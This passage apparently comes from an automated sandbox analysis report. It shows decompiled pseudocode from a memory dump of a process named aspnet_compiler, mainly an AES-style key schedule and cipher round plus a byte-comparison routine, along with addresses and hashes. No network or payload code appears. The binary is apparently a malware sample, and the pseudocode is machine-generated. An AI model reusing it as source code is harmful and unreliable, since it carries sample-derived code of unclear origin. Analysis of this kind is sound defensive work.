					_t432 = _t544[2] ^ _t250;
					_t544[5] = _t250;
					_t544[6] = _t432;
					_t544[7] = _t432 ^ _t482;
					_t545 = 4;
					do {
						_t534 =  &(_t534[4]);
						_t434 = _t534[2];
						_t122 = _t545 + 0x4656b8; // 0x2000000
						_t545 = _t545 + 4;
						_t488 =  *(0x466ae0 + (_t534[2] >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t534[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + (_t434 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4666e0 + (_t434 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t534 - 4);
						_t534[3] = _t488;
						_t267 =  *_t534 ^ _t488;
						_t534[4] = _t267;
						_t436 = _t534[1] ^ _t267;
						_t534[5] = _t436;
						_t534[6] = _t534[2] ^ _t436;
					} while (_t545 != 0x28);
					goto L12;
				} else {
					if(_t533 == 0x18) {
						_t462 = _t544[5];
						_t540 =  &(_t544[0xa]);
						_t506 = ( *(0x466ee0 + (_t544[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x466ae0 + (_t462 >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t462 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
						_t334 = _t544[1] ^ _t506;
						_t544[6] = _t506;
						_t544[7] = _t334;
						_t464 = _t544[2] ^ _t334;
						_t544[8] = _t464;
						_t544[9] = _t544[3] ^ _t464;
						_t549 = 4;
						do {
							_t466 =  *(_t540 - 0x18) ^  *(_t540 - 4);
							 *_t540 = _t466;
							_t540[1] =  *(_t540 - 0x14) ^ _t466;
							_t540 =  &(_t540[6]);
							_t467 =  *(_t540 - 0x14);
							_t88 = _t549 + 0x4656b8; // 0x2000000
							_t549 = _t549 + 4;
							_t512 =  *(0x466ae0 + ( *(_t540 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + ( *(_t540 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + (_t467 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4666e0 + (_t467 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t540 - 0x28);
							 *(_t540 - 0x10) = _t512;
							_t355 =  *(_t540 - 0x24) ^ _t512;
							 *(_t540 - 0xc) = _t355;
							_t469 =  *(_t540 - 0x20) ^ _t355;
							 *(_t540 - 8) = _t469;
							 *(_t540 - 4) =  *(_t540 - 0x1c) ^ _t469;
						} while (_t549 != 0x20);
						goto L12;
					} else {
						if(_t533 == 0x20) {
							_t470 = _t544[7];
							_t541 =  &(_t544[0xc]);
							_t519 = ( *(0x466ee0 + (_t544[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x466ae0 + (_t470 >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t470 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + (_t470 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
							_t373 = _t544[1] ^ _t519;
							_t544[8] = _t519;
							_t544[9] = _t373;
							_t472 = _t544[2] ^ _t373;
							_t544[0xa] = _t472;
							_t544[0xb] = _t544[3] ^ _t472;
							_t550 = 4;
							do {
								_t473 =  *(_t541 - 4);
								_t474 =  *(_t541 - 0x18);
								_t525 =  *(0x4672e0 + ( *(_t541 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + ( *(_t541 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x4666e0 + (_t473 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ae0 + (_t473 & 0x000000ff) * 4) & 0x000000ff ^  *(_t541 - 0x20);
								_t391 =  *(_t541 - 0x1c) ^ _t525;
								 *_t541 = _t525;
								_t541[1] = _t391;
								_t541 =  &(_t541[8]);
								_t475 = _t474 ^ _t391;
								 *(_t541 - 0x18) = _t475;
								 *(_t541 - 0x14) =  *(_t541 - 0x34) ^ _t475;
								_t476 =  *(_t541 - 0x14);
								_t48 = _t550 + 0x4656b8; // 0x2000000
								_t550 = _t550 + 4;
								_t531 =  *(0x466ae0 + ( *(_t541 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + ( *(_t541 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + (_t476 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4666e0 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t541 - 0x30);
								 *(_t541 - 0x10) = _t531;
								_t410 =  *(_t541 - 0x2c) ^ _t531;
								 *(_t541 - 0xc) = _t410;
								_t478 =  *(_t541 - 0x28) ^ _t410;
								 *(_t541 - 8) = _t478;
								 *(_t541 - 4) =  *(_t541 - 0x24) ^ _t478;
							} while (_t550 != 0x1c);
							L12:
							_t546 =  *((intOrPtr*)(_t560 + 0x10));
							_t536 = 1;
							if( *((intOrPtr*)(_t560 + 0x20)) == 1) {
								_t555 = _t546 + 8;
								_t418 =  *(_t546 + 0xf0) << 2;
								if(_t418 != 0) {
									_t134 = _t418 + 2; // 0x2
									_t538 = _t555;
									_t499 = _t546 + _t134 * 4;
									_t548 = 0;
									do {
										_t548 = _t548 + 4;
										_t418 = _t418 - 4;
										 *((intOrPtr*)(_t538 - 8)) =  *((intOrPtr*)(_t499 - 8));
										 *((intOrPtr*)(_t499 - 8)) =  *((intOrPtr*)(_t538 - 8));
										 *((intOrPtr*)(_t538 - 4)) =  *((intOrPtr*)(_t499 - 4));
										 *((intOrPtr*)(_t499 - 4)) =  *((intOrPtr*)(_t538 - 4));
										_t460 =  *_t538;
										 *_t538 =  *_t499;
										_t538 =  &(_t538[0x10]);
										_t318 = _t499[4];
										 *_t499 = _t460;
										_t499 = _t499 - 0x10;
										 *(_t538 - 0xc) = _t318;
										_t499[0x14] =  *(_t538 - 0xc);
									} while (_t548 < _t418);
									_t546 =  *((intOrPtr*)(_t560 + 0x10));
									_t536 = 1;
								}
								if( *(_t546 + 0xf0) > _t536) {
									do {
										_t555 =  &(_t555[0x10]);
										_t490 =  *(_t555 - 8);
										_t492 =  *(_t555 - 4);
										 *(_t555 - 8) =  *(0x4656e0 + ( *(0x466ae0 + ( *(_t555 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + ( *(_t555 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + ( *(_t555 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t494 =  *_t555;
										 *(_t555 - 4) =  *(0x4656e0 + ( *(0x466ae0 + ( *(_t555 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + ( *(_t555 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t492 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + ( *(_t555 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t496 = _t555[4];
										 *_t555 =  *(0x4656e0 + ( *(0x466ae0 + ( *_t555 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + ( *_t555 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t494 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + ( *_t555 & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t536 = _t536 + 1;
										_t555[4] =  *(0x4656e0 + ( *(0x466ae0 + (_t555[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + (_t555[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t496 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + (_t555[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
									} while (_t536 <  *(_t546 + 0xf0));
								}
							}
							_t489 =  *((intOrPtr*)(_t560 + 0x1c));
							_t437 = _t546;
							_pop(_t537);
							if(_t437 != 0) {
								_t270 = _t437 + 0xf8;
								_push(0x10);
								if(_t489 == 0) {
									_push(0);
									_push(_t270);
									E00435760(_t537);
								} else {
									_push(_t489);
									_push(_t270);
									E004351E0();
								}
								return 0;
							} else {
								return 0xffffff53;
							}
						} else {
							return 0xffffff53;
						}
					}
				}
			}



















































                0x00425ca8
                0x00425cad
                0x00425cb1
                0x00425cb5
                0x00425cc1
                0x00425cc8
                0x00425cce
                0x00425cd8
                0x00425cdd
                0x00425ce3
                0x00425f68
                0x00425f6b
                0x00425fc6
                0x00425fc8
                0x00425fcb
                0x00425fd0
                0x00425fd2
                0x00425fd5
                0x00425fda
                0x00425fdd
                0x00425fde
                0x00425fde
                0x00425fe1
                0x00426028
                0x0042602e
                0x00426031
                0x00426034
                0x00426039
                0x0042603b
                0x00426041
                0x00426043
                0x0042604b
                0x0042604e
                0x00000000
                0x00425ce9
                0x00425cec
                0x00425e5f
                0x00425e62
                0x00425ec1
                0x00425ec3
                0x00425ec5
                0x00425ec8
                0x00425ecb
                0x00425ed2
                0x00425ed5
                0x00425ed8
                0x00425ed9
                0x00425edc
                0x00425ee4
                0x00425ee6
                0x00425ee9
                0x00425eec
                0x00425f33
                0x00425f39
                0x00425f3c
                0x00425f3f
                0x00425f45
                0x00425f47
                0x00425f4d
                0x00425f4f
                0x00425f57
                0x00425f5a
                0x00000000
                0x00425cf2
                0x00425cf5
                0x00425d02
                0x00425d05
                0x00425d64
                0x00425d66
                0x00425d68
                0x00425d6b
                0x00425d6e
                0x00425d75
                0x00425d78
                0x00425d7b
                0x00425d7c
                0x00425d7c
                0x00425db9
                0x00425dc9
                0x00425dcc
                0x00425dce
                0x00425dd0
                0x00425dd3
                0x00425dd6
                0x00425ddd
                0x00425de0
                0x00425de3
                0x00425e2a
                0x00425e30
                0x00425e33
                0x00425e36
                0x00425e3c
                0x00425e3e
                0x00425e44
                0x00425e46
                0x00425e4e
                0x00425e51
                0x00426053
                0x00426053
                0x00426059
                0x0042605e
                0x0042606a
                0x0042606d
                0x00426072
                0x00426074
                0x00426077
                0x00426079
                0x0042607c
                0x0042607e
                0x00426081
                0x00426087
                0x0042608a
                0x00426090
                0x00426096
                0x0042609b
                0x0042609e
                0x004260a0
                0x004260a2
                0x004260a5
                0x004260a8
                0x004260aa
                0x004260b0
                0x004260b3
                0x004260b6
                0x004260ba
                0x004260c0
                0x004260c0
                0x004260c7
                0x004260cd
                0x004260cd
                0x004260d0
                0x00426104
                0x0042612e
                0x0042615d
                0x00426187
                0x004261b6
                0x004261e0
                0x00426231
                0x00426232
                0x00426235
                0x004260cd
                0x004260c7
                0x00426241
                0x00426245
                0x00426247
                0x004262a0
                0x004262a8
                0x004262ae
                0x004262b2
                0x004262bd
                0x004262bf
                0x004262c0
                0x004262b4
                0x004262b4
                0x004262b5
                0x004262b6
                0x004262b6
                0x004262ca
                0x004262a2
                0x004262a7
                0x004262a7
                0x00425cf7
                0x00425d01
                0x00425d01
                0x00425cf5
                0x00425cec

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd53bb4457494981ac9ffff9e019512b3ae3ba674395eb300ba5a457fe9aeb8c
                • Instruction ID: 5e3034ee98431e9cf8b51dbe22b47e1a6528dca8326acab9ca032b8c61487221
                • Opcode Fuzzy Hash: dd53bb4457494981ac9ffff9e019512b3ae3ba674395eb300ba5a457fe9aeb8c
                • Instruction Fuzzy Hash: FC029F716246518FC718CF2DEC5053AB7E1EB8E301B45863EE896D7381EB34E921DB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00425719 Relevance: .4, Instructions: 383COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00425719(signed int* __ecx, void* __edx) {
				void* _t227;
				signed int _t245;
				signed int _t246;
				signed int _t274;
				unsigned int _t394;
				int _t407;
				unsigned int _t410;
				signed char _t416;
				unsigned int _t444;
				unsigned int _t460;
				unsigned int _t478;
				unsigned int _t506;
				signed int _t510;
				unsigned int _t513;
				unsigned int _t514;
				unsigned int _t521;
				void* _t525;
				unsigned int _t526;
				signed int _t528;
				signed int _t529;
				signed int* _t530;
				signed int _t532;
				int _t534;
				signed int* _t535;
				signed int* _t536;
				unsigned int _t540;
				void* _t542;
				void* _t543;

				_t535 = __ecx;
				_t525 = __edx;
				_t540 =  *(__ecx + 0xf0) >> 1;
				if(_t540 <= 7 && _t540 != 0) {
					_t407 = 4;
					E004351E0(_t542 + 0x28, __edx, _t407);
					E004351E0(_t542 + 0x34, _t525 + 4, _t407);
					E004351E0(_t542 + 0x3c, _t525 + 8, _t407);
					E004351E0(_t542 + 0x44, _t525 + 0xc, _t407);
					_t543 = _t542 + 0x30;
					 *(_t543 + 0x28) = E004255F6( *((intOrPtr*)(_t542 + 0x50))) ^ _t535[1];
					 *(_t543 + 0x1c) = E004255F6( *(_t543 + 0x1c)) ^ _t535[2];
					 *(_t543 + 0x20) = E004255F6( *(_t543 + 0x18)) ^ _t535[3];
					_t245 = E004255F6( *(_t543 + 0x24));
					_t246 = E004256FC();
					_t526 =  *(_t543 + 0x1c);
					_t410 = _t245 ^  *_t535 | _t246;
					_t506 =  *(_t543 + 0x20);
					 *(_t543 + 0x20) =  *(0x466ee0 + (_t526 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x28) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t410 >> 0x18) * 4) ^  *(0x4672e0 + (_t506 & 0x000000ff) * 4) ^ _t535[4];
					 *(_t543 + 0x18) =  *(0x466ee0 + (_t506 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t526 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x28) >> 0x18) * 4) ^  *(0x4672e0 + (_t410 & 0x000000ff) * 4) ^ _t535[5];
					 *(_t543 + 0x10) =  *(0x466ae0 + (_t506 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t526 >> 0x18) * 4);
					 *(_t543 + 0x10) =  *(_t543 + 0x10) ^  *(0x466ee0 + (_t410 >> 0x00000008 & 0x000000ff) * 4);
					_t444 =  *(_t543 + 0x28);
					_t528 =  *(_t543 + 0x10) ^  *(0x4672e0 + (_t444 & 0x000000ff) * 4);
					 *(_t543 + 0x10) = _t528;
					 *(_t543 + 0x10) = _t528 ^ _t535[6];
					_t510 =  *(0x4666e0 + (_t506 >> 0x18) * 4) ^  *(0x466ee0 + (_t444 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t410 >> 0x00000010 & 0x000000ff) * 4);
					_t274 =  *(_t543 + 0x1c) & 0x000000ff;
					while(1) {
						_t512 = _t510 ^  *(0x4672e0 + _t274 * 4) ^ _t535[7];
						_t536 =  &(_t535[8]);
						 *(_t543 + 0x24) = _t536;
						 *(_t543 + 0x14) = _t510 ^  *(0x4672e0 + _t274 * 4) ^ _t535[7];
						_t540 = _t540 - 1;
						if(_t540 == 0) {
							break;
						}
						_t529 =  *(_t543 + 0x10);
						_t513 =  *(_t543 + 0x20);
						 *(_t543 + 0x1c) =  *(0x466ee0 + (_t529 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x18) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t513 >> 0x18) * 4) ^  *(0x4672e0 + ( *(_t543 + 0x14) & 0x000000ff) * 4) ^  *_t536;
						 *(_t543 + 0x28) =  *(0x466ee0 + ( *(_t543 + 0x14) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t529 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x18) >> 0x18) * 4) ^  *(0x4672e0 + (_t513 & 0x000000ff) * 4) ^ _t536[1];
						 *(_t543 + 0x14) =  *(_t543 + 0x14) >> 0x18;
						_t460 = _t513;
						_t514 =  *(_t543 + 0x18);
						_t416 =  *(0x466ae0 + ( *(_t543 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t529 >> 0x18) * 4) ^  *(0x466ee0 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4672e0 + (_t514 & 0x000000ff) * 4) ^ _t536[2];
						_t530 =  *(_t543 + 0x24);
						_t521 =  *(0x4666e0 +  *(_t543 + 0x14) * 4) ^  *(0x466ee0 + (_t514 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t460 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4672e0 + (_t529 & 0x000000ff) * 4) ^ _t536[3];
						 *(_t543 + 0x20) =  *(0x466ee0 + (_t416 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x28) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x1c) >> 0x18) * 4) ^  *(0x4672e0 + (_t521 & 0x000000ff) * 4) ^ _t530[4];
						_t535 = _t530;
						 *(_t543 + 0x18) =  *(0x466ee0 + (_t521 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t416 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x28) >> 0x18) * 4) ^  *(0x4672e0 + ( *(_t543 + 0x1c) & 0x000000ff) * 4) ^ _t535[5];
						 *(_t543 + 0x10) =  *(0x466ae0 + (_t521 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t416 >> 0x18) * 4);
						 *(_t543 + 0x10) =  *(_t543 + 0x10) ^  *(0x466ee0 + ( *(_t543 + 0x1c) >> 0x00000008 & 0x000000ff) * 4);
						_t478 =  *(_t543 + 0x28);
						_t532 =  *(_t543 + 0x10) ^  *(0x4672e0 + (_t478 & 0x000000ff) * 4);
						 *(_t543 + 0x10) = _t532;
						 *(_t543 + 0x10) = _t532 ^ _t535[6];
						_t510 =  *(0x4666e0 + (_t521 >> 0x18) * 4) ^  *(0x466ee0 + (_t478 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x1c) >> 0x00000010 & 0x000000ff) * 4);
						_t274 = _t416 & 0x000000ff;
					}
					_t533 = _t536;
					_t417 =  *(_t543 + 0x20);
					 *(_t543 + 0x24) = E004255F6( *(0x4672e0 + ( *(_t543 + 0x18) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + ( *(_t543 + 0x10) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ee0 + ( *(_t543 + 0x20) >> 0x18) * 4) & 0xff000000 ^  *(0x466ae0 + (_t512 & 0x000000ff) * 4) & 0x000000ff ^  *_t536);
					 *(_t543 + 0x20) = E004255F6( *(0x4672e0 + ( *(_t543 + 0x10) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + ( *(_t543 + 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ee0 + ( *(_t543 + 0x18) >> 0x18) * 4) & 0xff000000 ^  *(0x466ae0 + (_t417 & 0x000000ff) * 4) & 0x000000ff ^ _t533[1]);
					 *(_t543 + 0x1c) = E004255F6( *(0x4672e0 + ( *(_t543 + 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + ( *(_t543 + 0x10) >> 0x18) * 4) & 0xff000000 ^  *(0x4666e0 + (_t417 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ae0 + ( *(_t543 + 0x18) & 0x000000ff) * 4) & 0x000000ff ^ _t533[2]);
					_t394 = E004255F6( *(0x4672e0 + (_t417 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + ( *(_t543 + 0x14) >> 0x18) * 4) & 0xff000000 ^  *(0x4666e0 + ( *(_t543 + 0x18) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ae0 + ( *(_t543 + 0x10) & 0x000000ff) * 4) & 0x000000ff ^ _t533[3]);
					_t538 =  *((intOrPtr*)(_t543 + 0x30));
					_t534 = 4;
					 *(_t543 + 0x18) = _t394;
					E004351E0( *((intOrPtr*)(_t543 + 0x30)), _t543 + 0x24, _t534);
					E004351E0( *((intOrPtr*)(_t543 + 0x30)) + 4, _t543 + 0x30, _t534);
					E004351E0(_t538 + 8, _t543 + 0x38, _t534);
					return E004351E0(_t538 + 0xc, _t543 + 0x40, _t534);
				}
				return _t227;
			}































                0x0042571e
                0x00425721
                0x00425729
                0x0042572e
                0x0042573f
                0x00425747
                0x00425756
                0x00425765
                0x00425774
                0x0042577d
                0x0042578c
                0x0042579c
                0x004257ac
                0x004257b0
                0x004257b9
                0x004257be
                0x004257c2
                0x004257dd
                0x00425808
                0x00425845
                0x00425862
                0x00425883
                0x00425887
                0x00425895
                0x0042589e
                0x004258a5
                0x004258b6
                0x004258c1
                0x00425ad0
                0x00425ad7
                0x00425ada
                0x00425add
                0x00425ae1
                0x00425ae5
                0x00425ae8
                0x00000000
                0x00000000
                0x004258c9
                0x004258e6
                0x00425914
                0x00425956
                0x0042595f
                0x00425972
                0x00425974
                0x00425997
                0x004259be
                0x004259cb
                0x00425a0c
                0x00425a1f
                0x00425a52
                0x00425a6c
                0x00425a8c
                0x00425a90
                0x00425a9e
                0x00425aa7
                0x00425aae
                0x00425ac6
                0x00425acd
                0x00425acd
                0x00425afa
                0x00425afc
                0x00425b4c
                0x00425ba6
                0x00425c03
                0x00425c54
                0x00425c59
                0x00425c5f
                0x00425c60
                0x00425c6b
                0x00425c7a
                0x00425c89
                0x00000000
                0x00425ca0
                0x00425ca7

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 172271c9f3a8d2f206ea040ba3aa5d2b81077719746b0b9d367e61a4bdcfc719
                • Instruction ID: c78283a727a1133add5d327dfcd8014987219566089c4cde3c96dc6abaca164a
                • Opcode Fuzzy Hash: 172271c9f3a8d2f206ea040ba3aa5d2b81077719746b0b9d367e61a4bdcfc719
                • Instruction Fuzzy Hash: 0CF18D756242548FC704DF1DE89182BB3E1FB89340B45492EF582C7391DF78EA25CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00436603 Relevance: .3, Instructions: 345COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00436603(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
